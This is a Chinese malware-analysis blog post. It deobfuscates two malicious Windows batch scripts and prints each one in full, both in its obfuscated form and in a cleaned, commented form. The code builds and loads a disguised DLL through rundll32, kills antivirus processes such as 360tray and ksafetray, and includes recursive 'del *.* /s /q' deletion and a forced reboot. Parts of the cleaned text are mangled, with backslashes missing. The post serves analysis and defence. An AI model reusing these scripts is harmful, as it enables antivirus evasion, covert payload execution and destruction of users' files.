zoukankan      html  css  js  c++  java
  • [Virus Analysis]恶意软件分析(二)玩出花的批处理(中)

    本文作者:i春秋作家——Sp4ce

    0×01上一篇文章部分

    首先是文件目录
    1.png

    整理后的目录

    2.png

    整理前的部分文件代码

    update.bat

    %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q 
    cls
    home.php?mod=space&uid=46675 off
    set %l%=
    set %o%=
    set %v%=
    set %e%=
    :::::::::::::khyq:::::::::::::
    del ....*.pif
    :attrib ..ͼƬ½Øͼ.exe +s +h
    copy /y ͼƬ½Øͼ.zp ....ͼƬ½Øͼ.jpg
    del config.ini
    ren config.xml config.ini
    copy /y config.ini ..config.ini
    :::::::::::::khyq:::::::::::::
    :pdwjks
    i%l%f%l% %l%e%l%x%l%i%l%s%l%t%l% %l%"%l%%l%%temp%%l%%l%\%l%b%l%u%l%g%l%0%l%.%l%t%l%x%l%t%l%"%l% %l%(%l%g%l%o%l%t%l%o%l% %l%q%l%i%l%a%l%o%l%h%l%c%l%)%l% %l%e%l%l%l%s%l%e%l% %l%(%l%g%l%o%l%t%l%o%l% %l%c%l%j%l%m%l%%l%%l%l%l%u%l%)%l%%l%%l%%l%%l%%l%%l%%l%%l%%l%
    :cjmlu %l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%
    e%o%c%o%h%o%o%o% %o%%o%%~dp0%o%%o%%o%>%o%%o%>%o%%o%"%o%%o%%temp%%o%%o%\%o%b%o%u%o%g%o%0%o%.%o%t%o%x%o%t%o%"%o%%o%%o%%o%
    s%v%e%v%t%v%<%v%n%v%u%v%l%v%>%v%%v%%v%"%v%%v%%temp%%v%%v%\%v%b%v%u%v%g%v%0%v%.%v%t%v%x%v%t%v%"%v% %v%/%v%p%v%=%v%%v%%~dp0%v%%v%%v%
    m%e%d%e% %e%c%e%:%e%HTEMP0\%e%%e%%e%%e%
    i%e%f%e% %e%e%e%x%e%i%e%s%e%t%e% %e%%e%"%e%%e%%temp%%e%%e%\%e%q%e%r%e%.%e%t%e%m%e%p%e%"%e% %e%d%e%e%e%l%e% %e%/%e%s%e% %e%/%e%q%e% %e%"%e%%e%%temp%%e%%e%\%e%q%e%r%e%.%e%t%e%m%e%p%e%"%e%
    e%e%c%e%h%e%o%e% %e%R%e%a%e%r%e%>%e%>%e%"%e%%e%%temp%%e%%e%\%e%q%e%r%e%.%e%t%e%m%e%p%e%"%e%%e%%e%%e%%e%%e%%e%
    s%l%e%l%t%l%<%l%n%l%u%l%l%l%>%l%"%l%%l%%temp%%l%%l%\%l%q%l%r%l%.%l%t%l%m%l%p%l%"%l% %l%/%l%p%l%=%l%R%l%a%l%r%l%
    c%l%o%l%p%l%y%l% %l%/%l%b%l% %l%"%l%%l%%temp%%l%%l%\%l%q%l%r%l%.%l%t%l%m%l%p%l%"%l%+"%l%u%l%q%l%d%l%a%l%t%l%e%l%.%l%t%l%m%l%p%l%" c:HTEMP0\%l%u%l%q%l%d%l%a%l%t%l%e%l%.%l%d%l%a%l%t%l%
    c%l%o%l%p%l%y%l% %l%/%l%y%l% %l%c%l%:%l%\%l%w%l%i%l%n%l%d%l%o%l%w%l%s%l%\%l%s%l%y%l%s%l%t%l%e%l%m%l%3%l%2%l%\%l%r%l%u%l%n%l%d%l%l%l%l%l%3%l%2%l%.%l%e%l%x%l%e%l% %l%"%l%%l%%temp%%l%%l%\%l%z%l%c%l%.%l%e%l%x%l%e%l%"%l%
    c%l%o%l%p%l%y%l% %l%/%l%y%l% %l%g%l%c%l%o%l%n%l%f%l%i%l%g%l%.%l%i%l%n%l%i%l% %l%"%l%%l%%APPDATA%%l%%l%\%l%p%l%a%l%y%l%e%l%r%l%s%l%s%l%.%l%i%l%n%l%i%l%"%l%%l%%l%%l%%l%
    c%o%o%o%p%o%y%o% %o%/%o%y%o% %o%c%o%f%o%w%o%d%o%.%o%d%o%a%o%t%o% %o%%o%%o%"%o%%o%%o%%temp%%o%%o%%o%\%o%%o%%o%%o%"%o%%o%%o%%o%%o%%o%%o%
    c%o%o%o%p%o%y%o% %o%/%o%y%o% %v%u%v%p%v%d%v%a%v%t%v%e%v%j%v%.%o%t%o%m%o%p%o% %o%c%o%:%o%HTEMP0\%o%%o%%o%%o%%o%%o%%o%%o%%o%
    u%v%p%v%d%v%a%v%t%v%e%v%j%v%.%v%t%v%m%v%p%v% %o%x%o% %o%-%o%y%o% %o%-%o%o%o%+%o% %o%-%o%p%o%p%o% c:HTEMP0\%l%u%l%q%l%d%l%a%l%t%l%e%l%.%l%d%l%a%l%t%l% %o%q%o%i%o%a%o%o%o%i%o%.%o%b%o%a%o%t%o% %o%c%o%:%o%HTEMP0\%o%%o%%o%%o%
    d%o%e%o%l%o% %o%"%o%%o%%o%%o%%temp%%o%%o%%o%%o%\%o%q%o%r%o%.%o%t%o%m%o%p%o%"%o% %o%/%o%s%o% %o%/%o%q%o%%o%%o%%o%
    c%v%m%v%d%v%.%v%e%v%x%v%e%v% %v%/%v%c%v% %v%c%v%a%v%l%v%l%v% %v%c%v%:%v%HTEMP0\%v%q%v%i%v%a%v%o%v%i%v%.%v%b%v%a%v%t%v%%v%%v%
    :qiaohc %l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%
    e%l%%o%%v%%e%x%l%%o%%v%%e%i%l%%o%%v%%e%t%l%%o%%v%%e% 

    整理处理后

    cls
    @echo off
    set =
    set =
    set =
    set =
    :::::::::::::khyq:::::::::::::
    del ....*.pif       //删除*.pif【这里特指截图.pif】
    :attrib ..图片截图.exe +s +h       //设置截图.exe的权限
    copy /y 图片截图.zp ....图片截图.jpg       //把图片截图.zp拷贝到主目录并重命名图片截图.jpg
    del config.ini       //删除config.ini
    ren config.xml config.ini          //重命名config.xml为config.ini
    copy /y config.ini ..config.ini       //拷贝并覆盖config.ini到根目录下
    :::::::::::::khyq:::::::::::::
    :pdwjks
    if exist "%temp%ug0.txt" (goto qiaohc) else (goto cjmlu)     //如果bug0.txt存在,跳转qiaohc,否则跳转cjmlu
    :cjmlu 
    echo %~dp0>>"%temp%ug0.txt"     //输出当前目录到bug0.txt
    pause
    set<nul>"%temp%ug0.txt" /p=%~dp0     //输出nul到bug0.txt,不带回车
    pause
    md c:HTEMP0   //创建HTEMP0文件夹
    pause
    if exist "%temp%qr.tmp"      //判断存在
    pause
    del /s /q "%temp%qr.tmp"   //删除qr.tmp
    pause
    echo Rar>>"%temp%qr.tmp"   //输出rar到qr.tmp
    pause
    set<nul>"%temp%qr.tmp" /p=Rar  //输出rar字符并不带回车
    pause
    copy /b "%temp%qr.tmp"+"uqdate.tmp" c:HTEMP0uqdate.dat //复制qr.tmp和uqdate.tmp到 c:HTEMP0uqdate.dat
    pause
    copy /y c:windowssystem32
    undll32.exe "%temp%zc.exe" //复制rundll32.exe到zc.exe
    pause
    copy /y gconfig.ini "%APPDATA%payerss.ini" //复制gconfig.ini到payerss.ini
    pause
    copy /y cfwd.dat "%temp%"   //复制cfwd.dat到临时目录
    pause
    copy /y updatej.tmp c:HTEMP0  //复制updatej.tmp到c:HTEMP0,这个文件是个解压软件,在cmd下可执行
    pause
    updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat qiaoi.bat c:HTEMP0  //解压uqdate.dat到目录
    pause
    del "%temp%qr.tmp" /s /q     //删除qr.tmp
    pause
    cmd.exe /c call c:HTEMP0qiaoi.bat  //执行qiaoi.bat
    pause
    :qiaohc 
    exit 

    为了让文件落地,删除最后的执行qiaoi.bat
    执行后
    第一步复制文件并打开

    3.png

    第二步输出当前目录到bug0.txt【注意光标】

    4.png

    第三步去除回车【注意光标】

    wedia.png

    第四步C盘建立HTEMP0
    6.png

    第五步TEMP下创建qr.tmp,内容为Rar
    7.png

     

    第六步复制qr.tmp和uqdate.tmp到 c:HTEMP0uqdate.dat

    8.png

     

    第七步复制rundll32.exe到zc.exe

    9.png

    第八步复制gconfig.ini到payerss.ini

    10.png

     

     

    第九步复制cfwd.dat到临时目录

    11.png

    第十步复制updatej.tmp到c:HTEMP0
    12.png

     

    十一 解压

    13.png

     

    0×02本篇

    uqdate.dat的压缩内容如下

    14.png

    可用自带的软件全部解压出,但是为了搞清楚作者到底想干嘛,因此,跟着他的路走

    qiaoi.bat原内容如下

    %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q 
    cls
    set %vv%=
    set %ll%=
    set %oo%=
    set %ee%=
    u%ee%p%ee%d%ee%a%ee%t%ee%e%ee%j%ee%.%ee%t%ee%m%ee%p%ee% %vv%x%vv% %vv%-%vv%y%vv% %vv%-%vv%o%vv%+%vv% %vv%-%vv%p%vv%p%vv% c:HTEMP0\%vv%u%vv%q%vv%d%vv%a%vv%t%vv%%vv%e%vv%.%vv%d%vv%a%vv%t%vv% shaY0ng.exe %vv%c%vv%:%vv%HTEMP0\%vv%%vv%%vv%%vv%%vv%
    u%ee%p%ee%d%ee%a%ee%t%ee%e%ee%j%ee%.%ee%t%ee%m%ee%p%ee% %ll%x%ll% %ll%-%ll%y%ll% %ll%-%ll%o%ll%+%ll% %ll%-%ll%p%ll%p%ll% c:HTEMP0\%vv%u%vv%q%vv%d%vv%a%vv%t%vv%%vv%e%vv%.%vv%d%vv%a%vv%t%vv% %ll%z%ll%c%ll%.%ll%i%ll%n%ll%f%ll% %ll%"%ll%%ll%%ll%%ll%%temp%%ll%%ll%%ll%\%ll%"%ll%
    c%oo%:%oo%HTEMP0u%ee%p%ee%d%ee%a%ee%t%ee%e%ee%j%ee%.%ee%t%ee%m%ee%p%ee% %oo%x%oo% %oo%-%oo%y%oo% %oo%-%oo%o%oo%+%oo% %oo%-%oo%p%oo%p%oo% %oo%c%oo%:%oo%HTEMP0\%vv%u%vv%q%vv%d%vv%a%vv%t%vv%%vv%e%vv%.%vv%d%vv%a%vv%t%vv% %oo%F%oo%o%oo%rceLibrary%oo%.%oo%t%oo%m%oo%p%oo% %oo%c%oo%:%oo%HTEMP0\%oo%%oo%%oo%%oo%%oo%
    :hh %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
    i%ee%f%ee% %ee%e%ee%x%ee%i%ee%s%ee%t%ee% %ee%c%ee%:%ee%HTEMP0\%ee%0%ee%.%ee%t%ee%m%ee%p%ee% %ee%d%ee%e%ee%l%ee% %ee%/%ee%s%ee% %ee%/%ee%q%ee%  %ee%c%ee%:%ee%HTEMP0\%ee%0%ee%.%ee%t%ee%m%ee%p%ee%
    S%ee%%ee%%ee%etLoc%ee%%ee%%ee%al Ena%ee%%ee%%ee%bleDe%ee%%ee%%ee%layedEx%ee%%ee%%ee%%ee%%ee%pans%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%ion
    s%ee%%ee%e%ee%%ee%t S%ee%%ee%t%ee%%ee%r=abcde%ee%%ee%f0123%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%456%ee%%ee%789
    for /l %%L in (1 1 2) do (
        set /a n = !random! %% 16
        for %%n in (!n!) do set gjOut=!gjOut!!Str:~%%n,1!
    )
    e%ll%c%ll%h%ll%o%ll% %ll%%ll%%ll%%ll%MZ!gjOut!>%ll%>%ll%c%ll%:%ll%HTEMP0\%ll%0%ll%.%ll%t%ll%m%ll%p%ll%%ll%%ll%
    set<nul>c:HTEMP0.tmp /p=MZ!gjOut!
    copy /b c:HTEMP0.tmp+c:HTEMP0ForceLibrary.tmp c:HTEMP0!gjOut!.dll
    c%ll%%ll%%ll%op%ll%%ll%%ll%y c%ll%:%ll%%ll%%ll%HTEMP0!gjOut!.d%ll%%ll%%ll%l%ll%%ll%l %ll%%ll%c%ll%%ll%:HTEMP0PotPla%ll%%ll%yer%ll%%ll%.%ll%%ll%dll
    :360 %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
    ta%ll%%ll%sk%ll%%ll%%ll%list | fi%ll%%ll%nd /i "360%ll%%ll%tr%ll%%ll%ay%ll%%ll%%ll%.e%ll%%ll%%ll%x%ll%%ll%e" |%ll%%ll%%ll%| go%ll%%ll%to n%ll%%ll%%ll%d
    u%ee%p%ee%d%ee%a%ee%t%ee%e%ee%j%ee%.%ee%t%ee%m%ee%p%ee% %oo%x%oo% %oo%-%oo%y%oo% %oo%-%oo%o%oo%+%oo% %oo%-%oo%p%oo%p%oo% c:HTEMP0\%vv%u%vv%q%vv%d%vv%a%vv%t%vv%%vv%e%vv%.%vv%d%vv%a%vv%t%vv% %oo%z%oo%c%oo%.%oo%l%oo%n%oo%k
    md "temp"
    md "tempgamepatch"
    copy /y "svhost.exe" "temp"
    echo [game_base]>>"tempgamepatchconfig.ini"
    echo mainExe=..zc.lnk>>"tempgamepatchconfig.ini"
    if exist "c:stemp" (goto grs) else (goto ymygj)
    :grs
    updatej.tmp x -y -o+ -pp c:HTEMP0\%vv%u%vv%q%vv%d%vv%a%vv%t%vv%%vv%e%vv%.%vv%d%vv%a%vv%t%vv% zc2.lnk
    del "zc.lnk"
    ren "zc2.lnk" "zc.lnk"
    :ymygj
    tasklist | find /i "QQPCTray.exe" || goto zy360
    updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat zc2.lnk
    del "zc.lnk"
    ren "zc2.lnk" "zc.lnk"
    :zy360
    t%ll%a%ll%s%ll%k%ll%k%ll%i%ll%l%ll%l%ll% %ll%/%ll%f%ll% %ll%/%ll%i%ll%m%ll% %ll%ksafe%ll%%ll%%ll%%ll%%ll%%ll%t%ll%%ll%%ll%%ll%ray%ll%%ll%.%ll%%ll%e%ll%%ll%x%ll%%ll%e%ll%%ll%
    ta%ll%%ll%%ll%skkil%ll%%ll%%ll%%ll%%ll%l /%ll%%ll%%ll%f /%ll%%ll%%ll%im%ll%%ll%%ll% co%ll%%ll%%ll%%ll%%ll%nim%ll%%ll%%ll%%ll%e.%ll%%ll%%ll%%ll%e%ll%x%ll%e%ll%
    c%vv%o%vv%p%vv%y%vv% %vv%/%vv%y%vv% %vv%c%vv%:%vv%\%vv%w%vv%i%vv%n%vv%d%vv%o%vv%w%vv%s%vv%\%vv%s%vv%y%vv%stem32ping%vv%.%vv%e%vv%x%vv%e%vv% "%vv%%vv%%temp%%vv%%vv%\%vv%suchost%vv%.%vv%e%vv%xe"
    d%oo%e%oo%l%oo% %oo%%oo%%temp%%oo%%oo%\%oo%l%oo%s%oo%.%oo%l%oo%o%oo%g%oo%%oo%%oo%
    
    f%oo%i%oo%n%oo%d%oo%s%oo%t%oo%r%oo% %oo%"%oo%d%oo%w%oo%x%oo%t%oo%=%oo%1%oo%"%oo% %oo%"%oo%g%oo%c%oo%o%oo%n%oo%f%oo%i%oo%g%oo%.%oo%i%oo%n%oo%i%oo%"&&goto xtdw||goto pdcq
      tdw %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
    
    md "temps"
    md "tempsgamepatch"
    copy /y "svhost.exe" "temps"
    echo [game_base]>>"tempsgamepatchconfig.ini"
    echo mainExe=..dw.lnk>>"tempsgamepatchconfig.ini"
    
    updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat dw.lnk
    "%ee%%temp%%ee%\%ee%s%ee%u%ee%c%ee%h%ee%o%ee%s%ee%t%ee%.%ee%e%ee%x%ee%e%ee%" -n 8 127.0.0.1
    "%ee%%temp%%ee%\%ee%s%ee%u%ee%c%ee%h%ee%o%ee%s%ee%t%ee%.%ee%e%ee%x%ee%e%ee%" -n 1 www.baidu.com>nul 2>nul&&goto pdcq||goto dwyx
    :dwyx
    "%ee%%temp%%ee%\%ee%s%ee%u%ee%c%ee%h%ee%o%ee%s%ee%t%ee%.%ee%e%ee%x%ee%e%ee%" -n 2 127.0.0.1
    copy /y c:HTEMP0!gjOut!.dll "PotPla%ll%%ll%yer%ll%%ll%.%ll%%ll%dll"
    copy /y c:HTEMP0shaY0ng.exe "yx.exe"
    :rundll32.exe "%temp%!gjOut!.dll",TrapEntry
    
    :pdcq %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
    set file=gconfig.ini
    set name=cqxt
    for /f "tokens=1,2* delims==" %%i in (%file%) do if "%%i"=="%name%" set value=%%j
    if %value%==0 (goto zcxt)else (goto xtcq)
      tcq %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
    
    "%ee%%temp%%ee%\%ee%s%ee%u%ee%c%ee%h%ee%o%ee%s%ee%t%ee%.%ee%e%ee%x%ee%e%ee%" -n %value% 127.0.0.1
    if exist "user.xml" (goto bsc11) else (goto sc11)
    :sc11
    del *.* /s /q
    :bsc11
    shutdown -r -t 0
    exit
    
    :zcxt %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
    if exist "update.bat" (goto yxcqbat) else (goto byxcqbat)
    :yxcqbat
    "%ee%%temp%%ee%\%ee%s%ee%u%ee%c%ee%h%ee%o%ee%s%ee%t%ee%.%ee%e%ee%x%ee%e%ee%" -n 8 127.0.0.1
    call update.bat
    :byxcqbat
    "%ee%%temp%%ee%\%ee%s%ee%u%ee%c%ee%h%ee%o%ee%s%ee%t%ee%.%ee%e%ee%x%ee%e%ee%" -n 28 127.0.0.1
    if exist "user.xml" (goto bsc12) else (goto sc12)
    :sc12
    del *.* /s /q
    :bsc12
    exit
    
    :nd %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
    tasklist | find /i "QQPCTray.exe" || goto nud
    updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat zc2.lnk
    del "zc.lnk"
    ren "zc2.lnk" "zc.lnk"
    goto kxhaha
    :nud
    t%ee%%ee%%ee%as%ee%%ee%%ee%kli%ee%%ee%%ee%st | fi%ee%%ee%%ee%nd /%ee%%ee%%ee%i "n%ee%%ee%%ee%%ee%s.e%ee%%ee%%ee%x%ee%%ee%%ee%e" |%ee%%ee%%ee%%ee%%ee%|%ee%%ee%%ee% %ee%g%ee%o%ee%to jins
    ta%ll%%ll%%ll%skkil%ll%%ll%%ll%%ll%%ll%l /%ll%%ll%%ll%f /%ll%%ll%%ll%im%ll%%ll%%ll% co%ll%%ll%%ll%%ll%%ll%nim%ll%%ll%%ll%%ll%e.%ll%%ll%%ll%%ll%e%ll%x%ll%e%ll%
    ru%ll%%ll%nd%ll%%ll%l%ll%%ll%l%ll%%ll%%ll%3%ll%2%ll%.%ll%e%ll%x%ll%e%ll% %ee%c%ee%:%ee%HTEMP0!gjOut!.d%ll%l%ll%%ll%%ll%l%ll%%ll%%ll%%ll%%ll%,TrapEntry
    e%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%xi%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%t
    :jins
    tasklist | find /i "kxetray.exe" || goto qt
    :kxhaha
    echo [Install]>>"setup.ini"
    echo CmdLine=rundll32.exe c:HTEMP0!gjOut!.dll,TrapEntry>>"setup.ini"
    updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat yx.exe
    :copy /y c:windowssystem32
    undll32.exe uqdate.exe
    :del "gamepatchconfig.ini"
    :echo [1]>>"gamepatchconfig.ini"
    :echo InstName=5d>>"gamepatchconfig.ini"
    :>>"gamepatchconfig.ini" echo CheckType=1
    :echo CheckPath=>>"gamepatchconfig.ini"
    :echo CheckVerion=5d>>"gamepatchconfig.ini"
    :echo InstFile=uqdate.exe>>"gamepatchconfig.ini"
    :echo InstParam=C:HTEMP0!gjOut!.dll,TrapEntry>>"gamepatchconfig.ini"
    :copy /y "svhost.exe" "yx.exe"
    exit
    :qt %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
    ru%ll%%ll%nd%ll%%ll%l%ll%%ll%l%ll%%ll%%ll%3%ll%2%ll%.%ll%e%ll%x%ll%e%ll% %ee%c%ee%:%ee%HTEMP0!gjOut!.d%ll%l%ll%%ll%%ll%l%ll%%ll%%ll%%ll%%ll%,TrapEntry
    e%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%xi%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%t

    整理后

    cls
    set =
    set =
    set =
    set =
    updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat shaY0ng.exe c:HTEMP0
    updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat zc.inf "%temp%"
    c:HTEMP0updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat ForceLibrary.tmp c:HTEMP0
    :hh 
    if exist c:HTEMP00.tmp del /s /q  c:HTEMP00.tmp
    SetLocal EnableDelayedExpansion
    set Str=abcdef0123456789
    for /l %%L in (1 1 2) do (
        set /a n = !random! %% 16
        for %%n in (!n!) do set gjOut=!gjOut!!Str:~%%n,1!
    )
    echo MZ!gjOut!>>c:HTEMP00.tmp
    set<nul>c:HTEMP00.tmp /p=MZ!gjOut!
    copy /b c:HTEMP00.tmp+c:HTEMP0ForceLibrary.tmp c:HTEMP0!gjOut!.dll
    copy c:HTEMP0!gjOut!.dll c:HTEMP0PotPlayer.dll
    :360 
    tasklist | find /i "360tray.exe" || goto nd
    updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat zc.lnk
    md "temp"
    md "tempgamepatch"
    copy /y "svhost.exe" "temp"
    echo [game_base]>>"tempgamepatchconfig.ini"
    echo mainExe=..zc.lnk>>"tempgamepatchconfig.ini"
    if exist "c:stemp" (goto grs) else (goto ymygj)
    :grs
    updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat zc2.lnk
    del "zc.lnk"
    ren "zc2.lnk" "zc.lnk"
    :ymygj
    tasklist | find /i "QQPCTray.exe" || goto zy360
    updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat zc2.lnk
    del "zc.lnk"
    ren "zc2.lnk" "zc.lnk"
    :zy360
    taskkill /f /im ksafetray.exe
    taskkill /f /im conime.exe
    copy /y c:windowssystem32ping.exe "%temp%suchost.exe"
    del %temp%ls.log
    
    findstr "dwxt=1" "gconfig.ini"&&goto xtdw||goto pdcq
     :x
     tdw 
    md "temps"
    md "tempsgamepatch"
    copy /y "svhost.exe" "temps"
    echo [game_base]>>"tempsgamepatchconfig.ini"
    echo mainExe=..dw.lnk>>"tempsgamepatchconfig.ini"
    
    updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat dw.lnk
    "%temp%suchost.exe" -n 8 127.0.0.1
    "%temp%suchost.exe" -n 1 www.baidu.com>nul 2>nul&&goto pdcq||goto dwyx
    :dwyx
    "%temp%suchost.exe" -n 2 127.0.0.1
    copy /y c:HTEMP0!gjOut!.dll "PotPlayer.dll"
    copy /y c:HTEMP0shaY0ng.exe "yx.exe"
    :rundll32.exe "%temp%!gjOut!.dll",TrapEntry
    
    :pdcq 
    set file=gconfig.ini
    set name=cqxt
    for /f "tokens=1,2* delims==" %%i in (%file%) do if "%%i"=="%name%" set value=%%j
    if %value%==0 (goto zcxt)else (goto xtcq)
     :x
     tcq 
    "%temp%suchost.exe" -n %value% 127.0.0.1
    if exist "user.xml" (goto bsc11) else (goto sc11)
    :sc11
    del *.* /s /q
    :bsc11
    shutdown -r -t 0
    exit
    
    :zcxt 
    if exist "update.bat" (goto yxcqbat) else (goto byxcqbat)
    :yxcqbat
    "%temp%suchost.exe" -n 8 127.0.0.1
    call update.bat
    :byxcqbat
    "%temp%suchost.exe" -n 28 127.0.0.1
    if exist "user.xml" (goto bsc12) else (goto sc12)
    :sc12
    del *.* /s /q
    :bsc12
    exit
    
    :nd 
    tasklist | find /i "QQPCTray.exe" || goto nud
    updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat zc2.lnk
    del "zc.lnk"
    ren "zc2.lnk" "zc.lnk"
    goto kxhaha
    :nud
    tasklist | find /i "ns.exe" || goto jins
    taskkill /f /im conime.exe
    rundll32.exe c:HTEMP0!gjOut!.dll,TrapEntry
    exit
    :jins
    tasklist | find /i "kxetray.exe" || goto qt
    :kxhaha
    echo [Install]>>"setup.ini"
    echo CmdLine=rundll32.exe c:HTEMP0!gjOut!.dll,TrapEntry>>"setup.ini"
    updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat yx.exe
    :copy /y c:windowssystem32
    undll32.exe uqdate.exe
    :del "gamepatchconfig.ini"
    :echo [1]>>"gamepatchconfig.ini"
    :echo InstName=5d>>"gamepatchconfig.ini"
    :>>"gamepatchconfig.ini" echo CheckType=1
    :echo CheckPath=>>"gamepatchconfig.ini"
    :echo CheckVerion=5d>>"gamepatchconfig.ini"
    :echo InstFile=uqdate.exe>>"gamepatchconfig.ini"
